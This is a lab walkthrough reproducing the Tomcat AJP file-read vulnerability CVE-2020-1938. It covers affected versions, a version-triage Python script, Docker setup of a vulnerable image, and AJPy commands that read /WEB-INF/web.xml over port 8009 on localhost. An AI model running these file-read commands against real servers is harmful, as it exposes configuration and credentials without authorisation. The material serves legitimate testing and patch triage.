Preface
Affected versions
Apache Tomcat = 6
7 <= Apache Tomcat <7.0.100
8 <= Apache Tomcat <8.5.51
9 <= Apache Tomcat <9.0.31
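The ranges listed above can be turned into an inventory check. This is an added example, not code from the original post or from AJPy; the host names and banner strings are constructed. Versions are compared numerically, so 9.0.100 is not mistaken for a release older than 9.0.31.

```python
import re

# Affected ranges as listed on this page: major line -> first fixed release.
# None means the whole major line is listed as affected (Tomcat 6).
AFFECTED = {
    6: None,
    7: (7, 0, 100),
    8: (8, 5, 51),
    9: (9, 0, 31),
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Extract the first x.y.z version from a banner or version string."""
    match = _VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(text):
    """Return True if the version falls inside the ranges listed on this page."""
    version = parse_version(text)
    major = version[0]
    if major not in AFFECTED:
        return False
    fixed = AFFECTED[major]
    # Tuple comparison is numeric per component; a plain string comparison
    # would wrongly rank "9.0.100" below "9.0.31".
    return fixed is None or version < fixed


def triage(banners):
    """Map each host to True (affected) or False for a host -> banner dict."""
    return {host: is_affected(banner) for host, banner in banners.items()}


# Constructed sample inventory (hypothetical host names and banners).
SAMPLE = {
    "lab-docker": "Apache Tomcat/8.5.32",   # the image used in this walkthrough
    "app-01": "Apache Tomcat/8.5.51",
    "app-02": "Apache Tomcat/9.0.100",
    "legacy-01": "Apache Tomcat/6.0.53",
}

if __name__ == "__main__":
    for host, affected in triage(SAMPLE).items():
        print(f"{host}: {'AFFECTED' if affected else 'not in listed ranges'}")
```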
Identifiers
CNVD-2020-10487
CVE-2020-1938
Environment setup
Start Docker
systemctl start docker
Search for the image
docker search tomcat-8.5.32
Pull the image
docker pull duonghuuphuc/tomcat-8.5.32
Start the container
docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32
List running containers
docker ps
Access
http://127.0.0.1:8080/
Vulnerability reproduction
PoC download link
https://github.com/hypn0s/AJPy
git clone https://github.com/hypn0s/AJPy.git
cd AJPy
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
python tomcat.py version 127.0.0.1
References
https://github.com/hypn0s/AJPy
https://www.liuyixiang.com/post/109123.html